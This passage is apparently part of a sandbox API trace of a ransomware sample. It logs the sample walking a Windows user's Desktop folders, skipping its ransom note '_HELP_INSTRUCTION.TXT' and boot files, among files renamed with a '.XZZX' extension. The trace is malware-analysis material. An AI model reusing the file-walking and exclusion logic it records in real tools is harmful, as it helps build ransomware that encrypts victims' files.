lpSrch="NTLDR") returned 0x0 [0228.882] StrStrW (lpFirst="992D94E80C53825AE241BB580EEE66A2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.882] StrStrW (lpFirst="992D94E80C53825AE241BB580EEE66A2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.882] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.882] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.882] lstrcmpW (lpString1="9C15BB57408998F37E04B2C943547D3B.XZZX", lpString2="..") returned 1 [0228.882] lstrcmpW (lpString1="9C15BB57408998F37E04B2C943547D3B.XZZX", lpString2=".") returned 1 [0228.882] StrStrW (lpFirst="9C15BB57408998F37E04B2C943547D3B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.882] StrStrW (lpFirst="9C15BB57408998F37E04B2C943547D3B.XZZX", lpSrch="ntldr") returned 0x0 [0228.882] StrStrW (lpFirst="9C15BB57408998F37E04B2C943547D3B.XZZX", lpSrch="NTLDR") returned 0x0 [0228.882] StrStrW (lpFirst="9C15BB57408998F37E04B2C943547D3B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.882] StrStrW (lpFirst="9C15BB57408998F37E04B2C943547D3B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.882] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.882] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.882] lstrcmpW (lpString1="B4B65B2031FA98E00EE8EF9234A57D28.XZZX", lpString2="..") returned 1 [0228.882] lstrcmpW (lpString1="B4B65B2031FA98E00EE8EF9234A57D28.XZZX", lpString2=".") returned 1 [0228.882] StrStrW (lpFirst="B4B65B2031FA98E00EE8EF9234A57D28.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.882] StrStrW (lpFirst="B4B65B2031FA98E00EE8EF9234A57D28.XZZX", lpSrch="ntldr") returned 0x0 [0228.882] StrStrW (lpFirst="B4B65B2031FA98E00EE8EF9234A57D28.XZZX", lpSrch="NTLDR") returned 0x0 [0228.882] StrStrW (lpFirst="B4B65B2031FA98E00EE8EF9234A57D28.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.882] StrStrW (lpFirst="B4B65B2031FA98E00EE8EF9234A57D28.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.882] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.882] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.882] lstrcmpW (lpString1="BB588F142896CA4D429F9F1C2B61AE95.XZZX", lpString2="..") returned 1 [0228.882] lstrcmpW (lpString1="BB588F142896CA4D429F9F1C2B61AE95.XZZX", lpString2=".") returned 1 [0228.882] StrStrW (lpFirst="BB588F142896CA4D429F9F1C2B61AE95.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.882] StrStrW (lpFirst="BB588F142896CA4D429F9F1C2B61AE95.XZZX", lpSrch="ntldr") returned 0x0 [0228.882] StrStrW (lpFirst="BB588F142896CA4D429F9F1C2B61AE95.XZZX", lpSrch="NTLDR") returned 0x0 [0228.882] StrStrW (lpFirst="BB588F142896CA4D429F9F1C2B61AE95.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.882] StrStrW (lpFirst="BB588F142896CA4D429F9F1C2B61AE95.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.882] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.882] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.882] lstrcmpW (lpString1="CB04B3811A6F8BBEE0B0B6D31D1A7006.XZZX", lpString2="..") returned 1 [0228.882] lstrcmpW (lpString1="CB04B3811A6F8BBEE0B0B6D31D1A7006.XZZX", lpString2=".") returned 1 [0228.882] StrStrW (lpFirst="CB04B3811A6F8BBEE0B0B6D31D1A7006.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.882] StrStrW (lpFirst="CB04B3811A6F8BBEE0B0B6D31D1A7006.XZZX", lpSrch="ntldr") returned 0x0 [0228.883] StrStrW (lpFirst="CB04B3811A6F8BBEE0B0B6D31D1A7006.XZZX", lpSrch="NTLDR") returned 0x0 [0228.883] StrStrW (lpFirst="CB04B3811A6F8BBEE0B0B6D31D1A7006.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.883] StrStrW (lpFirst="CB04B3811A6F8BBEE0B0B6D31D1A7006.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.883] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.883] lstrcmpW (lpString1="D93E01F80BAD2630B7A5A4810E480A78.XZZX", lpString2="..") returned 1 [0228.883] lstrcmpW (lpString1="D93E01F80BAD2630B7A5A4810E480A78.XZZX", lpString2=".") returned 1 [0228.883] StrStrW (lpFirst="D93E01F80BAD2630B7A5A4810E480A78.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.883] StrStrW (lpFirst="D93E01F80BAD2630B7A5A4810E480A78.XZZX", lpSrch="ntldr") returned 0x0 [0228.883] StrStrW (lpFirst="D93E01F80BAD2630B7A5A4810E480A78.XZZX", lpSrch="NTLDR") returned 0x0 [0228.883] StrStrW (lpFirst="D93E01F80BAD2630B7A5A4810E480A78.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.883] StrStrW (lpFirst="D93E01F80BAD2630B7A5A4810E480A78.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.883] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.883] lstrcmpW (lpString1="DD2F494808F07B7C068185820B9B5FC4.XZZX", lpString2="..") returned 1 [0228.883] lstrcmpW (lpString1="DD2F494808F07B7C068185820B9B5FC4.XZZX", lpString2=".") returned 1 [0228.883] StrStrW (lpFirst="DD2F494808F07B7C068185820B9B5FC4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.883] StrStrW (lpFirst="DD2F494808F07B7C068185820B9B5FC4.XZZX", lpSrch="ntldr") returned 0x0 [0228.883] StrStrW (lpFirst="DD2F494808F07B7C068185820B9B5FC4.XZZX", lpSrch="NTLDR") returned 0x0 [0228.883] StrStrW (lpFirst="DD2F494808F07B7C068185820B9B5FC4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.883] StrStrW (lpFirst="DD2F494808F07B7C068185820B9B5FC4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.883] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.883] lstrcmpW (lpString1="DF31D96F11ED2C2F0C02623D14881077.XZZX", lpString2="..") returned 1 [0228.883] lstrcmpW (lpString1="DF31D96F11ED2C2F0C02623D14881077.XZZX", lpString2=".") returned 1 [0228.883] StrStrW (lpFirst="DF31D96F11ED2C2F0C02623D14881077.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.883] StrStrW (lpFirst="DF31D96F11ED2C2F0C02623D14881077.XZZX", lpSrch="ntldr") returned 0x0 [0228.883] StrStrW (lpFirst="DF31D96F11ED2C2F0C02623D14881077.XZZX", lpSrch="NTLDR") returned 0x0 [0228.883] StrStrW (lpFirst="DF31D96F11ED2C2F0C02623D14881077.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.883] StrStrW (lpFirst="DF31D96F11ED2C2F0C02623D14881077.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.883] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.883] lstrcmpW (lpString1="DF36633018C45D50D22CF61F1B5F4198.XZZX", lpString2="..") returned 1 [0228.883] lstrcmpW (lpString1="DF36633018C45D50D22CF61F1B5F4198.XZZX", lpString2=".") returned 1 [0228.883] StrStrW (lpFirst="DF36633018C45D50D22CF61F1B5F4198.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.883] StrStrW (lpFirst="DF36633018C45D50D22CF61F1B5F4198.XZZX", lpSrch="ntldr") returned 0x0 [0228.883] StrStrW (lpFirst="DF36633018C45D50D22CF61F1B5F4198.XZZX", lpSrch="NTLDR") returned 0x0 [0228.883] StrStrW (lpFirst="DF36633018C45D50D22CF61F1B5F4198.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.883] StrStrW (lpFirst="DF36633018C45D50D22CF61F1B5F4198.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.884] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.884] lstrcmpW (lpString1="E50598804514D2A02376220C47BFB6E8.XZZX", lpString2="..") returned 1 [0228.884] lstrcmpW (lpString1="E50598804514D2A02376220C47BFB6E8.XZZX", lpString2=".") returned 1 [0228.884] StrStrW (lpFirst="E50598804514D2A02376220C47BFB6E8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.884] StrStrW (lpFirst="E50598804514D2A02376220C47BFB6E8.XZZX", lpSrch="ntldr") returned 0x0 [0228.884] StrStrW (lpFirst="E50598804514D2A02376220C47BFB6E8.XZZX", lpSrch="NTLDR") returned 0x0 [0228.884] StrStrW (lpFirst="E50598804514D2A02376220C47BFB6E8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.884] StrStrW (lpFirst="E50598804514D2A02376220C47BFB6E8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.884] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.884] lstrcmpW (lpString1="E81AA92127D9DDF67EDCD7852A74C23E.XZZX", lpString2="..") returned 1 [0228.884] lstrcmpW (lpString1="E81AA92127D9DDF67EDCD7852A74C23E.XZZX", lpString2=".") returned 1 [0228.884] StrStrW (lpFirst="E81AA92127D9DDF67EDCD7852A74C23E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.884] StrStrW (lpFirst="E81AA92127D9DDF67EDCD7852A74C23E.XZZX", lpSrch="ntldr") returned 0x0 [0228.884] StrStrW (lpFirst="E81AA92127D9DDF67EDCD7852A74C23E.XZZX", lpSrch="NTLDR") returned 0x0 [0228.884] StrStrW (lpFirst="E81AA92127D9DDF67EDCD7852A74C23E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.884] StrStrW (lpFirst="E81AA92127D9DDF67EDCD7852A74C23E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.884] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.884] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.884] lstrcmpW (lpString1="F1621E5927CB75F785544EA92A665A3F.XZZX", lpString2="..") returned 1 [0228.884] lstrcmpW (lpString1="F1621E5927CB75F785544EA92A665A3F.XZZX", lpString2=".") returned 1 [0228.884] StrStrW (lpFirst="F1621E5927CB75F785544EA92A665A3F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.884] StrStrW (lpFirst="F1621E5927CB75F785544EA92A665A3F.XZZX", lpSrch="ntldr") returned 0x0 [0228.884] StrStrW (lpFirst="F1621E5927CB75F785544EA92A665A3F.XZZX", lpSrch="NTLDR") returned 0x0 [0228.884] StrStrW (lpFirst="F1621E5927CB75F785544EA92A665A3F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.884] StrStrW (lpFirst="F1621E5927CB75F785544EA92A665A3F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.884] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.884] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.884] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.884] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0228.884] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0228.884] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0228.884] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0228.884] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0228.885] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0228.885] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0228.885] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0228.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0228.885] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="Desktop" [0228.885] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0228.885] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0228.885] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0228.885] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0228.885] SetErrorMode (uMode=0x1) returned 0x1 [0228.885] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0228.885] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0228.885] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0228.885] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*" [0228.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0228.885] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0228.885] lstrcpyW (in: lpString1=0x17b644, lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0228.885] StrStrW (lpFirst="264E8978238A26C478B38BEE26250B0C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.885] StrStrW (lpFirst="264E8978238A26C478B38BEE26250B0C.XZZX", lpSrch="ntldr") returned 0x0 [0228.885] StrStrW (lpFirst="264E8978238A26C478B38BEE26250B0C.XZZX", lpSrch="NTLDR") returned 0x0 [0228.885] StrStrW (lpFirst="264E8978238A26C478B38BEE26250B0C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.885] StrStrW (lpFirst="264E8978238A26C478B38BEE26250B0C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0228.885] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.886] lstrcmpW (lpString1="46EBDC270E18B2453D2848DF10B3968D.XZZX", lpString2="..") returned 1 [0228.886] lstrcmpW (lpString1="46EBDC270E18B2453D2848DF10B3968D.XZZX", lpString2=".") returned 1 [0228.886] StrStrW (lpFirst="46EBDC270E18B2453D2848DF10B3968D.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.886] StrStrW (lpFirst="46EBDC270E18B2453D2848DF10B3968D.XZZX", lpSrch="ntldr") returned 0x0 [0228.886] StrStrW (lpFirst="46EBDC270E18B2453D2848DF10B3968D.XZZX", lpSrch="NTLDR") returned 0x0 [0228.886] StrStrW (lpFirst="46EBDC270E18B2453D2848DF10B3968D.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.886] StrStrW (lpFirst="46EBDC270E18B2453D2848DF10B3968D.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.886] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0228.886] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.886] lstrcmpW (lpString1="6CCF439C27C8E0021B579B862A63C44A.XZZX", lpString2="..") returned 1 [0228.886] lstrcmpW (lpString1="6CCF439C27C8E0021B579B862A63C44A.XZZX", lpString2=".") returned 1 [0228.886] StrStrW (lpFirst="6CCF439C27C8E0021B579B862A63C44A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.886] StrStrW (lpFirst="6CCF439C27C8E0021B579B862A63C44A.XZZX", lpSrch="ntldr") returned 0x0 [0228.886] StrStrW (lpFirst="6CCF439C27C8E0021B579B862A63C44A.XZZX", lpSrch="NTLDR") returned 0x0 [0228.886] StrStrW (lpFirst="6CCF439C27C8E0021B579B862A63C44A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.886] StrStrW (lpFirst="6CCF439C27C8E0021B579B862A63C44A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.886] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0228.886] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.886] lstrcmpW (lpString1="7A0DF8C008543AF04031BD840AEF1F38.XZZX", lpString2="..") returned 1 [0228.886] lstrcmpW (lpString1="7A0DF8C008543AF04031BD840AEF1F38.XZZX", lpString2=".") returned 1 [0228.886] StrStrW (lpFirst="7A0DF8C008543AF04031BD840AEF1F38.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.886] StrStrW (lpFirst="7A0DF8C008543AF04031BD840AEF1F38.XZZX", lpSrch="ntldr") returned 0x0 [0228.886] StrStrW (lpFirst="7A0DF8C008543AF04031BD840AEF1F38.XZZX", lpSrch="NTLDR") returned 0x0 [0228.886] StrStrW (lpFirst="7A0DF8C008543AF04031BD840AEF1F38.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.886] StrStrW (lpFirst="7A0DF8C008543AF04031BD840AEF1F38.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.886] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0228.886] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.886] lstrcmpW (lpString1="83C1838C2E60DE68F9CF738530FBC2B0.XZZX", lpString2="..") returned 1 [0228.886] lstrcmpW (lpString1="83C1838C2E60DE68F9CF738530FBC2B0.XZZX", lpString2=".") returned 1 [0228.886] StrStrW (lpFirst="83C1838C2E60DE68F9CF738530FBC2B0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.886] StrStrW (lpFirst="83C1838C2E60DE68F9CF738530FBC2B0.XZZX", lpSrch="ntldr") returned 0x0 [0228.886] StrStrW (lpFirst="83C1838C2E60DE68F9CF738530FBC2B0.XZZX", lpSrch="NTLDR") returned 0x0 [0228.886] StrStrW (lpFirst="83C1838C2E60DE68F9CF738530FBC2B0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.886] StrStrW (lpFirst="83C1838C2E60DE68F9CF738530FBC2B0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.886] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0228.886] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.886] lstrcmpW (lpString1="910A44A405CFC3CC320BF52E086AA814.XZZX", lpString2="..") returned 1 [0228.886] lstrcmpW (lpString1="910A44A405CFC3CC320BF52E086AA814.XZZX", lpString2=".") returned 1 [0228.887] StrStrW (lpFirst="910A44A405CFC3CC320BF52E086AA814.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.887] StrStrW (lpFirst="910A44A405CFC3CC320BF52E086AA814.XZZX", lpSrch="ntldr") returned 0x0 [0228.887] StrStrW (lpFirst="910A44A405CFC3CC320BF52E086AA814.XZZX", lpSrch="NTLDR") returned 0x0 [0228.887] StrStrW (lpFirst="910A44A405CFC3CC320BF52E086AA814.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.887] StrStrW (lpFirst="910A44A405CFC3CC320BF52E086AA814.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.887] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0228.887] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.887] lstrcmpW (lpString1="B79C27C02FF18394C4F93E40328C67DC.XZZX", lpString2="..") returned 1 [0228.887] lstrcmpW (lpString1="B79C27C02FF18394C4F93E40328C67DC.XZZX", lpString2=".") returned 1 [0228.887] StrStrW (lpFirst="B79C27C02FF18394C4F93E40328C67DC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.887] StrStrW (lpFirst="B79C27C02FF18394C4F93E40328C67DC.XZZX", lpSrch="ntldr") returned 0x0 [0228.887] StrStrW (lpFirst="B79C27C02FF18394C4F93E40328C67DC.XZZX", lpSrch="NTLDR") returned 0x0 [0228.887] StrStrW (lpFirst="B79C27C02FF18394C4F93E40328C67DC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.887] StrStrW (lpFirst="B79C27C02FF18394C4F93E40328C67DC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.887] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0228.887] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.887] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0228.887] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0228.887] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0228.887] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0228.887] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0228.887] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0228.887] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0228.887] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*" [0228.887] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0228.887] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*", 